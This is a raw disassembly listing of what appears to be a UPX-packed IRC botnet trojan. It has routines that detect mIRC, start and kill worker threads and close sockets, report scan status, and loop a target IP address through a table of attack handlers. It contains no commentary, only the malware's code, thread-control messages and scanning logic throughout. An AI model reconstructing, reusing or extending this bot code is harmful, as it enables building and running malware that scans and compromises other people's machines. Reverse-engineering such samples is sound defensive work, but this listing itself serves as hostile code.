edi pop edi pop esi leave retn ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 94h push esi lea eax, [ebp-94h] push edi push eax mov esi, offset byte_43D808 mov dword ptr [ebp-94h], 94h call dword_4270C8 ; GetVersionExA call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 cmp dword ptr [ebp-90h], 4 pop ecx jnz short loc_40AF65 cmp dword ptr [ebp-8Ch], 0 jnz short loc_40AF45 cmp dword ptr [ebp-84h], 1 jnz short loc_40AF35 mov esi, offset dword_431974 loc_40AF35: ; CODE XREF: UPX0:0040AF2Ej cmp dword ptr [ebp-84h], 2 jnz short loc_40AFA1 mov esi, offset dword_431970 jmp short loc_40AFA1 ; --------------------------------------------------------------------------- loc_40AF45: ; CODE XREF: UPX0:0040AF25j cmp dword ptr [ebp-8Ch], 0Ah jnz short loc_40AF55 mov esi, offset dword_43196C jmp short loc_40AFA1 ; --------------------------------------------------------------------------- loc_40AF55: ; CODE XREF: UPX0:0040AF4Cj cmp dword ptr [ebp-8Ch], 5Ah jnz short loc_40AF9C mov esi, offset dword_431968 jmp short loc_40AFA1 ; --------------------------------------------------------------------------- loc_40AF65: ; CODE XREF: UPX0:0040AF1Cj cmp dword ptr [ebp-90h], 5 jnz short loc_40AF9C cmp dword ptr [ebp-8Ch], 0 jnz short loc_40AF7E mov esi, offset dword_431964 jmp short loc_40AFA1 ; --------------------------------------------------------------------------- loc_40AF7E: ; CODE XREF: UPX0:0040AF75j cmp dword ptr [ebp-8Ch], 1 jnz short loc_40AF8E mov esi, offset dword_431960 jmp short loc_40AFA1 ; --------------------------------------------------------------------------- loc_40AF8E: ; CODE XREF: UPX0:0040AF85j cmp dword ptr [ebp-8Ch], 2 mov esi, offset dword_43195C jz short loc_40AFA1 loc_40AF9C: ; CODE XREF: UPX0:0040AF5Cj ; UPX0:0040AF6Cj mov esi, offset dword_431958 loc_40AFA1: ; CODE XREF: UPX0:0040AF3Cj ; UPX0:0040AF43j ... mov edi, [ebp+8] push esi push offset dword_431950 push 1Ch push edi call sub_41B980 xor esi, esi add esp, 10h cmp dword_429098, esi jle short loc_40AFE5 loc_40AFBF: ; CODE XREF: UPX0:0040AFE3j call sub_41B8E2 push 0Ah cdq pop ecx idiv ecx push edx push edi push offset dword_42BB64 push 1Ch push edi call sub_41B980 add esp, 14h inc esi cmp esi, dword_429098 jl short loc_40AFBF loc_40AFE5: ; CODE XREF: UPX0:0040AFBDj mov eax, edi pop edi pop esi leave retn ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40AFEB proc near ; CODE XREF: sub_40B08E+5Cp var_1C = byte ptr -1Ch arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 1Ch push esi call dword_4270A8 ; GetTickCount xor edx, edx mov ecx, 5265C00h div ecx push 0 push offset aMirc_0 ; "mIRC" mov esi, eax cmp esi, 64h jbe short loc_40B03A call ds:dword_4CB660 ; FindWindowA test eax, eax mov eax, offset dword_431980 jnz short loc_40B023 mov eax, offset byte_43D808 loc_40B023: ; CODE XREF: sub_40AFEB+31j push eax push esi push offset dword_431978 lea eax, [ebp+var_1C] push 1Ch push eax call sub_41B980 add esp, 14h jmp short loc_40B05A ; --------------------------------------------------------------------------- loc_40B03A: ; CODE XREF: sub_40AFEB+22j call ds:dword_4CB660 ; FindWindowA test eax, eax mov eax, offset dword_431980 jnz short loc_40B04E mov eax, offset byte_43D808 loc_40B04E: ; CODE XREF: sub_40AFEB+5Cj push eax lea eax, [ebp+var_1C] push eax call sub_41B886 pop ecx pop ecx loc_40B05A: ; CODE XREF: sub_40AFEB+4Dj lea eax, [ebp+var_1C] push eax call sub_41AFE0 pop ecx cmp eax, 2 pop esi jbe short loc_40B089 push 1Ch lea eax, [ebp+var_1C] push [ebp+arg_0] push eax call sub_41C1E0 lea eax, [ebp+var_1C] push 1Ch push eax push [ebp+arg_0] call sub_41B5F0 add esp, 18h loc_40B089: ; CODE XREF: sub_40AFEB+7Dj mov eax, [ebp+arg_0] leave retn sub_40AFEB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B08E proc near ; CODE XREF: sub_4017ED+7Fp ; sub_401955+50p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push esi push edi xor edi, edi mov esi, offset dword_42DC84 loc_40B09A: ; CODE XREF: sub_40B08E+3Fj cmp [ebp+arg_C], 0 jz short loc_40B0B5 lea eax, [esi-0Ch] push eax push [ebp+arg_C] call sub_41C070 neg eax pop ecx sbb eax, eax pop ecx inc eax jmp short loc_40B0BF ; --------------------------------------------------------------------------- loc_40B0B5: ; CODE XREF: sub_40B08E+10j mov ecx, [esi] xor eax, eax cmp ecx, [ebp+arg_4] setz al loc_40B0BF: ; CODE XREF: sub_40B08E+25j test eax, eax jnz short loc_40B0D1 add esi, 14h inc edi cmp esi, offset off_42DCFC jb short loc_40B09A jmp short loc_40B0DF ; --------------------------------------------------------------------------- loc_40B0D1: ; CODE XREF: sub_40B08E+33j push [ebp+arg_0] lea eax, [edi+edi*4] call off_42DC88[eax*4] pop ecx loc_40B0DF: ; CODE XREF: sub_40B08E+41j cmp [ebp+arg_8], 0 pop edi pop esi jz short loc_40B0F2 push [ebp+arg_0] call sub_40AFEB pop ecx pop ebp retn ; --------------------------------------------------------------------------- loc_40B0F2: ; CODE XREF: sub_40B08E+57j mov eax, [ebp+arg_0] pop ebp retn sub_40B08E endp ; =============== S U B R O U T I N E ======================================= sub_40B0F7 proc near ; CODE XREF: sub_401221+378p ; sub_401221+3B7p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push edi xor edi, edi mov eax, offset dword_43E390 loc_40B0FF: ; CODE XREF: sub_40B0F7+18j cmp byte ptr [eax], 0 jz short loc_40B113 add eax, 234h inc edi cmp eax, offset dword_4CB390 jl short loc_40B0FF jmp short loc_40B15E ; --------------------------------------------------------------------------- loc_40B113: ; CODE XREF: sub_40B0F7+Bj push esi mov esi, edi imul esi, 234h push 1FFh push [esp+0Ch+arg_0] lea eax, dword_43E390[esi] push eax call sub_41B5F0 mov eax, [esp+14h+arg_4] add esp, 0Ch mov dword_43E590[esi], eax and dword_43E594[esi], 0 mov eax, [esp+8+arg_8] and dword_43E598[esi], 0 mov dword_43E59C[esi], eax and byte_43E5A8[esi], 0 pop esi loc_40B15E: ; CODE XREF: sub_40B0F7+1Aj mov eax, edi pop edi retn sub_40B0F7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B162 proc near ; DATA XREF: sub_401ACD+298Ao var_98 = dword ptr -98h var_94 = byte ptr -94h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 98h mov eax, [ebp+arg_0] push esi push edi push 26h pop ecx mov esi, eax lea edi, [ebp+var_98] rep movsd push [ebp+var_10] mov dword ptr [eax+94h], 1 lea eax, [ebp+var_94] push [ebp+var_C] push eax push [ebp+var_98] call sub_40B1B4 push [ebp+var_14] call sub_40B413 add esp, 14h push 0 call dword_4270CC ; ExitThread pop edi pop esi sub_40B162 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B1B4 proc near ; CODE XREF: sub_40B162+38p var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 200h push esi push edi push 0 push [ebp+arg_8] push offset dword_431A80 push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h xor edi, edi mov esi, offset dword_43E390 loc_40B1DE: ; CODE XREF: sub_40B1B4+78j cmp byte ptr [esi], 0 jz short loc_40B21F cmp [ebp+arg_C], 0 jnz short loc_40B1F2 cmp dword ptr [esi+204h], 0 jnz short loc_40B21F loc_40B1F2: ; CODE XREF: sub_40B1B4+33j push esi push edi lea eax, [ebp+var_200] push offset aD_S ; "%d. %s" push eax call sub_41B886 push 1 lea eax, [ebp+var_200] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 24h loc_40B21F: ; CODE XREF: sub_40B1B4+2Dj ; sub_40B1B4+3Cj add esi, 234h inc edi cmp esi, offset dword_4CB390 jl short loc_40B1DE pop edi pop esi leave retn sub_40B1B4 endp ; =============== S U B R O U T I N E ======================================= sub_40B232 proc near ; CODE XREF: sub_401ACD+7BA5p ; sub_40B2C0+12p ... arg_0 = dword ptr 4 push ebx push ebp push esi mov esi, [esp+0Ch+arg_0] xor ebx, ebx xor ebp, ebp cmp esi, ebx jle short loc_40B2BA cmp esi, 400h jge short loc_40B2BA imul esi, 234h push edi push ebx push dword_43E5A4[esi] lea edi, dword_43E5A4[esi] call dword_4270AC ; TerminateThread cmp [edi], ebx jz short loc_40B26A push 1 pop ebp loc_40B26A: ; CODE XREF: sub_40B232+33j mov [edi], ebx lea edi, dword_43E598[esi] mov dword_43E590[esi], ebx mov dword_43E594[esi], ebx mov eax, [edi] cmp eax, ebx jbe short loc_40B28B push eax call sub_4199CA pop ecx loc_40B28B: ; CODE XREF: sub_40B232+50j mov [edi], ebx lea edi, dword_43E59C[esi] mov byte ptr dword_43E390[esi], bl mov byte_43E5A8[esi], bl push dword ptr [edi] call ds:dword_4CB6EC ; closesocket lea esi, dword_43E5A0[esi] mov [edi], ebx push dword ptr [esi] call ds:dword_4CB6EC ; closesocket mov [esi], ebx pop edi loc_40B2BA: ; CODE XREF: sub_40B232+Dj ; sub_40B232+15j mov eax, ebp pop esi pop ebp pop ebx retn sub_40B232 endp ; =============== S U B R O U T I N E ======================================= sub_40B2C0 proc near ; CODE XREF: sub_40111D+18p ; sub_401221:loc_4017D9p ... push ebx push esi push edi xor ebx, ebx xor edi, edi mov esi, offset dword_43E390 loc_40B2CC: ; CODE XREF: sub_40B2C0+2Aj cmp byte ptr [esi], 0 jz short loc_40B2DD push edi call sub_40B232 test eax, eax pop ecx jz short loc_40B2DD inc ebx loc_40B2DD: ; CODE XREF: sub_40B2C0+Fj ; sub_40B2C0+1Aj add esi, 234h inc edi cmp esi, offset dword_4CB390 jl short loc_40B2CC pop edi mov eax, ebx pop esi pop ebx retn sub_40B2C0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B2F2 proc near ; CODE XREF: sub_401ACD+418Fp ; sub_401ACD+42E1p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ebx push esi xor ebx, ebx push edi mov edi, [ebp+arg_4] mov [ebp+var_4], ebx mov esi, offset dword_43E594 loc_40B306: ; CODE XREF: sub_40B2F2+43j mov eax, [esi-4] cmp eax, [ebp+arg_0] jnz short loc_40B328 test edi, edi jle short loc_40B31A cmp [esi], edi jz short loc_40B31A cmp ebx, edi jnz short loc_40B328 loc_40B31A: ; CODE XREF: sub_40B2F2+1Ej ; sub_40B2F2+22j push ebx call sub_40B232 test eax, eax pop ecx jz short loc_40B328 inc [ebp+var_4] loc_40B328: ; CODE XREF: sub_40B2F2+1Aj ; sub_40B2F2+26j ... add esi, 234h inc ebx cmp esi, offset dword_4CB594 jl short loc_40B306 mov eax, [ebp+var_4] pop edi pop esi pop ebx leave retn sub_40B2F2 endp ; =============== S U B R O U T I N E ======================================= sub_40B33F proc near ; CODE XREF: sub_401221+40Fp ; sub_401ACD+97Ap ... arg_0 = dword ptr 4 xor eax, eax mov ecx, offset dword_43E590 loc_40B346: ; CODE XREF: sub_40B33F+1Cj mov edx, [ecx] cmp edx, [esp+arg_0] jnz short loc_40B34F inc eax loc_40B34F: ; CODE XREF: sub_40B33F+Dj add ecx, 234h cmp ecx, offset dword_4CB590 jl short loc_40B346 retn sub_40B33F endp ; =============== S U B R O U T I N E ======================================= sub_40B35E proc near ; CODE XREF: sub_401ACD+2434p arg_0 = dword ptr 4 xor eax, eax push esi xor edx, edx mov ecx, offset dword_43E590 loc_40B368: ; CODE XREF: sub_40B35E+1Fj mov esi, [ecx] cmp esi, [esp+4+arg_0] jz short loc_40B381 add ecx, 234h inc edx cmp ecx, offset dword_4CB590 jl short loc_40B368 pop esi retn ; --------------------------------------------------------------------------- loc_40B381: ; CODE XREF: sub_40B35E+10j mov eax, edx pop esi retn sub_40B35E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B385 proc near ; CODE XREF: sub_401ACD+1067p ; sub_401ACD+126Dp ... var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp sub esp, 200h xor eax, eax cmp [ebp+arg_1C], eax jz short loc_40B39E push [ebp+arg_1C] call sub_41B779 pop ecx loc_40B39E: ; CODE XREF: sub_40B385+Ej push eax push [ebp+arg_18] call sub_40B2F2 pop ecx test eax, eax pop ecx jle short loc_40B3CA push eax lea eax, [ebp+var_200] push [ebp+arg_14] push [ebp+arg_10] push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)" push eax call sub_41B886 add esp, 14h jmp short loc_40B3E4 ; --------------------------------------------------------------------------- loc_40B3CA: ; CODE XREF: sub_40B385+26j push [ebp+arg_14] lea eax, [ebp+var_200] push [ebp+arg_10] push offset aSNoSThreadFoun ; "%s No %s thread found." push eax call sub_41B886 add esp, 10h loc_40B3E4: ; CODE XREF: sub_40B385+43j cmp [ebp+arg_C], 0 jnz short loc_40B404 push 0 lea eax, [ebp+var_200] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_40B404: ; CODE XREF: sub_40B385+63j lea eax, [ebp+var_200] push eax call sub_4151AD pop ecx leave retn sub_40B385 endp ; =============== S U B R O U T I N E ======================================= sub_40B413 proc near ; CODE XREF: sub_4017ED+159p ; sub_40B162+40p ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] xor ecx, ecx imul eax, 234h mov dword_43E5A4[eax], ecx mov dword_43E590[eax], ecx mov dword_43E594[eax], ecx mov dword_43E598[eax], ecx mov dword_43E59C[eax], ecx mov dword_43E5A0[eax], ecx mov byte ptr dword_43E390[eax], cl mov byte_43E5A8[eax], cl retn sub_40B413 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B450 proc near ; CODE XREF: sub_401ACD+7E3Cp ; sub_40B57E+6Bp ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push 1 pop eax loc_40B45A: ; CODE XREF: sub_40B450+68j mov cl, [esi] test cl, cl jz short loc_40B4BA cmp eax, 1 jnz short loc_40B4BA mov edx, [ebp+arg_4] mov dl, [edx] test dl, dl jz short loc_40B4BA cmp cl, 2Ah jz short loc_40B4A1 cmp cl, 3Fh jz short loc_40B484 cmp cl, 5Bh jz short loc_40B489 xor eax, eax cmp cl, dl setz al loc_40B484: ; CODE XREF: sub_40B450+26j inc [ebp+arg_4] jmp short loc_40B4B4 ; --------------------------------------------------------------------------- loc_40B489: ; CODE XREF: sub_40B450+2Bj lea eax, [ebp+arg_4] inc esi push eax lea eax, [ebp+arg_0] push eax mov [ebp+arg_0], esi call sub_40B4E6 mov esi, [ebp+arg_0] pop ecx pop ecx jmp short loc_40B4B4 ; --------------------------------------------------------------------------- loc_40B4A1: ; CODE XREF: sub_40B450+21j lea eax, [ebp+arg_4] push eax lea eax, [ebp+arg_0] push eax call sub_40B57E mov esi, [ebp+arg_0] pop ecx pop ecx dec esi loc_40B4B4: ; CODE XREF: sub_40B450+37j ; sub_40B450+4Fj inc esi mov [ebp+arg_0], esi jmp short loc_40B45A ; --------------------------------------------------------------------------- loc_40B4BA: ; CODE XREF: sub_40B450+Ej ; sub_40B450+13j ... cmp byte ptr [esi], 2Ah jnz short loc_40B4CA cmp eax, 1 jnz short loc_40B4E1 inc esi mov [ebp+arg_0], esi jmp short loc_40B4BA ; --------------------------------------------------------------------------- loc_40B4CA: ; CODE XREF: sub_40B450+6Dj cmp eax, 1 jnz short loc_40B4E1 mov eax, [ebp+arg_4] cmp byte ptr [eax], 0 jnz short loc_40B4E1 cmp byte ptr [esi], 0 jnz short loc_40B4E1 push 1 pop eax jmp short loc_40B4E3 ; --------------------------------------------------------------------------- loc_40B4E1: ; CODE XREF: sub_40B450+72j ; sub_40B450+7Dj ... xor eax, eax loc_40B4E3: ; CODE XREF: sub_40B450+8Fj pop esi pop ebp retn sub_40B450 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B4E6 proc near ; CODE XREF: sub_40B450+45p var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ecx mov edx, [ebp+arg_0] push edi xor edi, edi push 1 mov ecx, [edx] and [ebp+var_8], edi pop eax cmp byte ptr [ecx], 21h mov [ebp+var_4], eax jnz short loc_40B507 inc ecx mov [ebp+var_8], eax mov [edx], ecx loc_40B507: ; CODE XREF: sub_40B4E6+19j push ebx push esi loc_40B509: ; CODE XREF: sub_40B4E6+7Bj mov ecx, [edx] mov bl, [ecx] cmp bl, 5Dh jnz short loc_40B517 cmp [ebp+var_4], eax jnz short loc_40B563 loc_40B517: ; CODE XREF: sub_40B4E6+2Aj test edi, edi jnz short loc_40B558 cmp bl, 2Dh jnz short loc_40B54C mov al, [ecx+1] lea esi, [ecx+1] mov cl, [ecx-1] cmp cl, al jge short loc_40B54C cmp al, 5Dh jz short loc_40B54C cmp [ebp+var_4], edi jnz short loc_40B54C mov ebx, [ebp+arg_4] mov ebx, [ebx] mov bl, [ebx] cmp bl, cl jl short loc_40B558 cmp bl, al jg short loc_40B558 push 1 mov [edx], esi pop edi jmp short loc_40B558 ; --------------------------------------------------------------------------- loc_40B54C: ; CODE XREF: sub_40B4E6+38j ; sub_40B4E6+45j ... mov eax, [ebp+arg_4] mov eax, [eax] cmp bl, [eax] jnz short loc_40B558 push 1 pop edi loc_40B558: ; CODE XREF: sub_40B4E6+33j ; sub_40B4E6+59j ... inc dword ptr [edx] and [ebp+var_4], 0 push 1 pop eax jmp short loc_40B509 ; --------------------------------------------------------------------------- loc_40B563: ; CODE XREF: sub_40B4E6+2Fj cmp [ebp+var_8], eax pop esi pop ebx jnz short loc_40B570 mov ecx, eax sub ecx, edi mov edi, ecx loc_40B570: ; CODE XREF: sub_40B4E6+82j cmp edi, eax jnz short loc_40B579 mov eax, [ebp+arg_4] inc dword ptr [eax] loc_40B579: ; CODE XREF: sub_40B4E6+8Cj mov eax, edi pop edi leave retn sub_40B4E6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B57E proc near ; CODE XREF: sub_40B450+59p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ebx push esi mov esi, [ebp+arg_0] push edi mov edi, [ebp+arg_4] mov [ebp+var_4], 1 inc dword ptr [esi] mov ecx, [esi] mov eax, [edi] xor ebx, ebx loc_40B59A: ; CODE XREF: sub_40B57E+3Aj cmp [eax], bl jz short loc_40B5BA mov cl, [ecx] cmp cl, 3Fh jz short loc_40B5AF cmp cl, 2Ah jnz short loc_40B5BA cmp cl, 3Fh jnz short loc_40B5B2 loc_40B5AF: ; CODE XREF: sub_40B57E+25j inc eax mov [edi], eax loc_40B5B2: ; CODE XREF: sub_40B57E+2Fj inc dword ptr [esi] mov ecx, [esi] mov eax, [edi] jmp short loc_40B59A ; --------------------------------------------------------------------------- loc_40B5BA: ; CODE XREF: sub_40B57E+1Ej ; sub_40B57E+2Aj ... mov eax, [esi] cmp byte ptr [eax], 2Ah jnz short loc_40B5C5 inc dword ptr [esi] jmp short loc_40B5BA ; --------------------------------------------------------------------------- loc_40B5C5: ; CODE XREF: sub_40B57E+41j mov eax, [edi] mov cl, [eax] cmp cl, bl jnz short loc_40B5E6 mov edx, [esi] cmp [edx], bl jz short loc_40B5D7 xor eax, eax jmp short loc_40B646 ; --------------------------------------------------------------------------- loc_40B5D7: ; CODE XREF: sub_40B57E+53j cmp cl, bl jnz short loc_40B5E6 mov ecx, [esi] cmp [ecx], bl jnz short loc_40B5E6 push 1 pop eax jmp short loc_40B646 ; --------------------------------------------------------------------------- loc_40B5E6: ; CODE XREF: sub_40B57E+4Dj ; sub_40B57E+5Bj ... push eax push dword ptr [esi] call sub_40B450 pop ecx test eax, eax pop ecx jnz short loc_40B630 loc_40B5F4: ; CODE XREF: sub_40B57E+B0j inc dword ptr [edi] mov eax, [edi] loc_40B5F8: ; CODE XREF: sub_40B57E+90j mov ecx, [esi] mov dl, [eax] mov cl, [ecx] cmp cl, dl jz short loc_40B610 cmp cl, 5Bh jz short loc_40B610 cmp dl, bl jz short loc_40B610 inc eax mov [edi], eax jmp short loc_40B5F8 ; --------------------------------------------------------------------------- loc_40B610: ; CODE XREF: sub_40B57E+82j ; sub_40B57E+87j ... mov eax, [edi] cmp [eax], bl jz short loc_40B627 push eax push dword ptr [esi] call sub_40B450 neg eax pop ecx sbb eax, eax pop ecx inc eax jmp short loc_40B62C ; --------------------------------------------------------------------------- loc_40B627: ; CODE XREF: sub_40B57E+96j mov [ebp+var_4], ebx xor eax, eax loc_40B62C: ; CODE XREF: sub_40B57E+A7j cmp eax, ebx jnz short loc_40B5F4 loc_40B630: ; CODE XREF: sub_40B57E+74j mov eax, [edi] cmp [eax], bl jnz short loc_40B643 mov eax, [esi] cmp [eax], bl jnz short loc_40B643 mov [ebp+var_4], 1 loc_40B643: ; CODE XREF: sub_40B57E+B6j ; sub_40B57E+BCj mov eax, [ebp+var_4] loc_40B646: ; CODE XREF: sub_40B57E+57j ; sub_40B57E+66j pop edi pop esi pop ebx leave retn sub_40B57E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B64B proc near ; CODE XREF: sub_401ACD+2AF6p var_400 = byte ptr -400h var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 400h push ebx push edi lea eax, [ebp+var_200] push offset unk_431E9C push eax xor ebx, ebx call sub_41B886 cmp dword_431B00, ebx pop ecx pop ecx mov edi, 200h jz short loc_40B6BD push esi mov esi, offset dword_431B08 loc_40B67E: ; CODE XREF: sub_40B64B+6Fj mov eax, [esi] test eax, eax jbe short loc_40B6B3 add ebx, eax push eax lea eax, [esi-26h] push eax lea eax, [ebp+var_400] push offset dword_431E90 push eax call sub_41B886 lea eax, [ebp+var_400] push edi push eax lea eax, [ebp+var_200] push eax call sub_41C1E0 add esp, 1Ch loc_40B6B3: ; CODE XREF: sub_40B64B+37j add esi, 40h cmp dword ptr [esi-8], 0 jnz short loc_40B67E pop esi loc_40B6BD: ; CODE XREF: sub_40B64B+2Bj push ds:dword_4CB394 call sub_41A88C pop ecx push eax push ebx lea eax, [ebp+var_400] push offset aTotalDInS_ ; " Total: %d in %s." push eax call sub_41B886 lea eax, [ebp+var_400] push edi push eax lea eax, [ebp+var_200] push eax call sub_41C1E0 push 0 lea eax, [ebp+var_200] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_200] push eax call sub_4151AD add esp, 34h pop edi pop ebx leave retn sub_40B64B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B71A proc near ; CODE XREF: sub_401ACD+2AE0p var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 200h mov eax, ds:dword_4CE160 mov ecx, ds:dword_4CE15C push esi push ds:dword_4CB394 lea esi, [ecx+eax] call sub_41A88C pop ecx push eax push esi push ds:dword_4CE160 lea eax, [ebp+var_200] push ds:dword_4CE15C push offset unk_431EBC push eax call sub_41B886 push 0 lea eax, [ebp+var_200] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_200] push eax call sub_4151AD add esp, 30h pop esi leave retn sub_40B71A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B786 proc near ; CODE XREF: sub_401ACD+2ACAp var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 200h push ds:dword_4CB394 call sub_41A88C pop ecx push eax lea eax, [ebp+var_200] push ds:dword_4CE3A4 push offset unk_431F04 push eax call sub_41B886 push 0 lea eax, [ebp+var_200] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_200] push eax call sub_4151AD add esp, 28h leave retn sub_40B786 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B7DB proc near ; CODE XREF: sub_401ACD+2AB4p var_1000 = byte ptr -1000h var_800 = byte ptr -800h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, 1000h call sub_41BB20 push edi lea eax, [ebp+var_800] push offset dword_431F50 push eax call sub_41B886 cmp dword_431B00, 0 pop ecx pop ecx mov edi, 800h jz short loc_40B847 push esi mov esi, offset aSymantec ; "Symantec" loc_40B810: ; CODE XREF: sub_40B7DB+69j lea eax, [esi-0Ah] push eax push esi lea eax, [ebp+var_1000] push offset dword_431F40 push eax call sub_41B886 lea eax, [ebp+var_1000] push edi push eax lea eax, [ebp+var_800] push eax call sub_41C1E0 add esi, 40h add esp, 1Ch cmp dword ptr [esi+1Eh], 0 jnz short loc_40B810 pop esi loc_40B847: ; CODE XREF: sub_40B7DB+2Dj push ds:dword_4CB394 call sub_41A88C pop ecx push eax lea eax, [ebp+var_1000] push offset aScanTimeS_ ; " Scan Time: %s." push eax call sub_41B886 lea eax, [ebp+var_1000] push edi push eax lea eax, [ebp+var_800] push eax call sub_41C1E0 push 0 lea eax, [ebp+var_800] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_800] push eax call sub_4151AD add esp, 30h pop edi leave retn sub_40B7DB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40B8A2 proc near ; DATA XREF: sub_401ACD+30E1o var_3F0 = byte ptr -3F0h var_1F0 = dword ptr -1F0h var_1EC = byte ptr -1ECh var_1DC = byte ptr -1DCh var_15C = byte ptr -15Ch var_150 = dword ptr -150h var_14C = dword ptr -14Ch var_148 = dword ptr -148h var_140 = dword ptr -140h var_13C = dword ptr -13Ch var_134 = byte ptr -134h var_124 = byte ptr -124h var_A4 = byte ptr -0A4h var_24 = dword ptr -24h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 3F0h mov eax, [ebp+arg_0] push ebx push esi push edi push 4Bh mov esi, eax pop ecx lea edi, [ebp+var_134] rep movsd mov dword ptr [eax+128h], 1 lea eax, [ebp+var_134] push eax call ds:dword_4CB694 ; inet_addr xor edi, edi mov [ebp+var_8], eax cmp dword_431B00, edi mov [ebp+var_4], edi mov [ebp+arg_0], edi jz loc_40BA04 mov ebx, offset dword_431B00 mov eax, ebx loc_40B8F3: ; CODE XREF: sub_40B8A2+15Cj push [ebp+var_1C] push dword ptr [eax] push [ebp+var_8] call sub_40C088 add esp, 0Ch cmp eax, 1 jnz loc_40B9F4 push dword ptr [ebx] lea esi, [ebx-28h] lea eax, [ebp+var_134] push eax lea eax, [esi+0Ah] push eax lea eax, [ebp+var_3F0] push offset unk_431FA0 push eax call sub_41B886 push edi lea eax, [ebp+var_3F0] push [ebp+var_14] push eax lea eax, [ebp+var_124] push eax push [ebp+var_24] call sub_409A73 lea eax, [ebp+var_3F0] push eax call sub_4151AD add esp, 2Ch lea eax, [ebp+var_134] push eax lea eax, [ebp+var_1EC] push eax call sub_41B886 pop ecx lea eax, [ebp+var_15C] pop ecx push esi push eax call sub_41B886 cmp [ebp+var_A4], 0 pop ecx pop ecx lea eax, [ebp+var_A4] jnz short loc_40B98F lea eax, [ebp+var_124] loc_40B98F: ; CODE XREF: sub_40B8A2+E5j push eax lea eax, [ebp+var_1DC] push eax call sub_41B886 mov eax, [ebp+var_24] pop ecx mov [ebp+var_1F0], eax mov eax, [ebp+var_14] mov [ebp+var_140], eax mov eax, [ebp+var_10] pop ecx mov [ebp+var_13C], eax mov eax, [ebx] sub esp, 0BCh mov [ebp+var_150], eax mov eax, [ebp+var_18] push 2Fh mov [ebp+var_14C], eax mov eax, [ebp+arg_0] pop ecx lea esi, [ebp+var_1F0] mov edi, esp mov [ebp+var_148], eax rep movsd call dword ptr [ebx+4] add esp, 0BCh inc [ebp+var_4] xor edi, edi loc_40B9F4: ; CODE XREF: sub_40B8A2+64j inc [ebp+arg_0] add ebx, 40h mov eax, ebx cmp [ebx], edi jnz loc_40B8F3 loc_40BA04: ; CODE XREF: sub_40B8A2+44j push [ebp+var_4] lea eax, [ebp+var_134] push eax lea eax, [ebp+var_3F0] push offset unk_431F6C push eax call sub_41B886 push edi lea eax, [ebp+var_3F0] push [ebp+var_14] push eax lea eax, [ebp+var_124] push eax push [ebp+var_24] call sub_409A73 lea eax, [ebp+var_3F0] push eax call sub_4151AD push [ebp+var_18] call sub_40B413 add esp, 2Ch push edi call dword_4270CC 